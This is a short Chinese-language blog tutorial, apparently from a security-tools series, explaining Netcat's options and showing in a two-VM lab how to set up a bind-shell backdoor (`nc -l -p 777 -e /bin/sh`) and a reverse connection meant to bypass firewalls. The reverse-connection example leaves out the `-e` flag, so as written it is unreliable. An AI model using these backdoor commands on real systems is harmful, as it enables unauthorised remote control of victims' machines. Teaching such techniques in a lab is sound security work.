哈囉~
我們前幾天提到,
可以利用網路監聽、密碼破解來取得使用權限,
今天我們要來介紹可以做遠端控制或後門的工具。![]()
即俗稱的nc,具有有網路連線能力。
有兩種執行模式:
nc 參數 Host port
nc [-l或-L] [-p PORT] [-s 封包發送位置] 參數
常用參數:
| 參數 | 說明 |
|---|---|
| -l | 啟動接聽模式(Server) |
| -d | 後台模式。可用於隱藏行蹤 |
| -p | 指定埠號 |
| -s | 指定封包發送位址 |
| -n | 指定IP位址 |
| -w | 連線等候時間 |
| -t | 使用Telnet |
| -u | 使用UDP |
| -e | 指定連線後執行的程式 |
| -c | 指定連線後執行的腳本 |
| -0 | 輸出hex格式的資料 |
| -v | 輸出更詳細的內容 |
| -z | 關閉輸入/輸出 |
簡易的通訊連接
環境準備:
一台VM當Server (192.168.168.129)
一台VM當Client (192.168.168.131)
nc -ltp 77
telnet [Server IP] [Port]
建立簡易的遠端後門
Server在Port 777上等待接聽,連線成功就會執行/bin/sh。
nc -l -p 777 -e /bin/sh

若是Window則使用-e cmd.exe。
此時Client(攻擊者)若執行Port 777,就會取得Server的遠端操作權限。
上面這個例子如果遇到一些公司/機構開啟了防火牆,阻止特定端口對外連線,就會無法實踐。
若是透過反向連線,就可以避開防火牆的管制。
建立後門反向連線
若是反過來換攻擊者先執行了接聽模式。
nc -l -p 80

Server若有開啟 80 port 向外連線時,就會建立反向連線。
nc [IP address] 80

攻擊者收到連線後,就可以操作Server了。
今天示範Netcat(nc)的操作,
雖說這個工具的限制在於要想辦法讓受害端執行nc,
但若受害端執行了nc,攻擊者可以透過nc來遠端操控目標系統的電腦,也能上傳/下載檔案,
也是可見其功能的威力強大呀...畢竟Netcat有個別名叫網路瑞士刀!其實小妹我有點get不到這個名稱的意思(ºωº)?
走囉! 高歌離席~![]()